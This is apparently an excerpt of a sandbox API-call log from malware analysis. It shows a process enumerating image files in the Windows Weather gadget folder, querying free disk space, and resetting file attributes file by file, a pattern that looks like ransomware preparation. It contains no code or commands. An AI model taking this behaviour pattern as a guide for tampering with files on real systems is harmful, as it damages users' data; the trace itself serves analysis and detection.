ftLastWriteTime.dwLowDateTime=0xbdf60c7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x758e, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked-loading.png", cAlternateFileName="")) returned 1 [0135.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc58e56d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc58e56d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf86ddc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6ddb, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_cloudy.png", cAlternateFileName="")) returned 1 [0135.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc5b46cc, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc5b46cc, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdf86ddc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6d83, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_few-showers.png", cAlternateFileName="")) returned 1 [0135.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc60098a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc60098a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfacf3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7ee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_foggy.png", cAlternateFileName="")) returned 1 [0135.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc6e51c4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc6e51c4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfacf3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7aae, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_hail.png", cAlternateFileName="")) returned 1 [0135.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc70b323, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc70b323, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfacf3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4bfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-first-quarter.png", cAlternateFileName="")) returned 1 [0135.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7575e1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7575e1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfd309c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x60f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-first-quarter_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7575e1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7575e1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfd309c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4ee2, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-full.png", cAlternateFileName="")) returned 1 [0135.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc77d740, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc77d740, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdfd309c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x65e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-full_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a389f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7a389f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdff91fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4a10, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-last-quarter.png", cAlternateFileName="")) returned 1 [0135.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a389f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7a389f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbdff91fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x61ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-last-quarter_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7c99fe, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7c99fe, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0454bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x558a, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-new.png", cAlternateFileName="")) returned 1 [0135.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7efb5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc7efb5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0454bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6ae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-new_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc83be1b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc83be1b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe06b61c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4d81, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waning-crescent.png", cAlternateFileName="")) returned 1 [0135.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc861f7a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc861f7a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe06b61c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6469, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waning-crescent_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc861f7a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc861f7a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe09177c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4b87, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waning-gibbous.png", cAlternateFileName="")) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8880d9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc8880d9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe09177c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x62fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waning-gibbous_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8ae238, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc8ae238, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0b78dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4dd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waxing-crescent.png", cAlternateFileName="")) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8ae238, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc8ae238, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0b78dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6455, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waxing-crescent_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8d4397, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc8d4397, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0dda3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waxing-gibbous.png", cAlternateFileName="")) returned 1 [0135.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8fa4f6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc8fa4f6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe0dda3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6222, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_moon-waxing-gibbous_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc920655, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc920655, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe103b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x94ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_rainy.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc9467b4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc9467b4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x918c, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_snow.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc96c913, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc96c913, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_thunderstorm.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc992a72, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc992a72, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x9c38, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_black_windy.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc992a72, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc992a72, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6add, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_blue_partly-cloudy.png", cAlternateFileName="")) returned 1 [0135.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc9b8bd1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc9b8bd1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa3cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_blue_snow.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc9ded30, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc9ded30, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe129cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8f5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_blue_sun.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca04e8f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbca04e8f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe14fe5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbc54, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_blue_windy.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca2afee, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbca2afee, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe14fe5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8184, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_cloudy.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca772ac, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbca772ac, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe14fe5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8450, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_few-showers.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca772ac, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbca772ac, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe14fe5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x893d, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_foggy.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac356a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcac356a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe175fbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x9508, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_hail.png", cAlternateFileName="")) returned 1 [0135.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcae96c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcae96c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe175fbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa742, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_rainy.png", cAlternateFileName="")) returned 1 [0135.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb35987, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcb35987, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe175fbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa0df, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_snow.png", cAlternateFileName="")) returned 1 [0135.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb35987, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcb35987, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe19c11c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x92d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_thunderstorm.png", cAlternateFileName="")) returned 1 [0135.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb35987, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcb35987, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe19c11c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x92d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="undocked_gray_thunderstorm.png", cAlternateFileName="")) returned 0 [0135.495] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.495] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.496] CoTaskMemFree (pv=0x4e1c10) [0135.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818acf3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818acf3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe19c11c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbe19c11c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbe19c11c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x28c, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)alertIcon.png", cAlternateFileName="")) returned 1 [0135.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf02919, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf02919, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1c227c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)grayStateIcon.png", cAlternateFileName="")) returned 1 [0135.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf28a78, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf28a78, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1c227c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)greenStateIcon.png", cAlternateFileName="")) returned 1 [0135.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf28a78, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf28a78, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1e83dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)notConnectedStateIcon.png", cAlternateFileName="")) returned 1 [0135.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbf4ebd7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbf4ebd7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbe1e83dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="(120DPI)redStateIcon.png", cAlternateFileName="")) returned 1 [0135.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.509] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png", dwFileAttributes=0x80) returned 0 [0135.511] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0135.516] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, 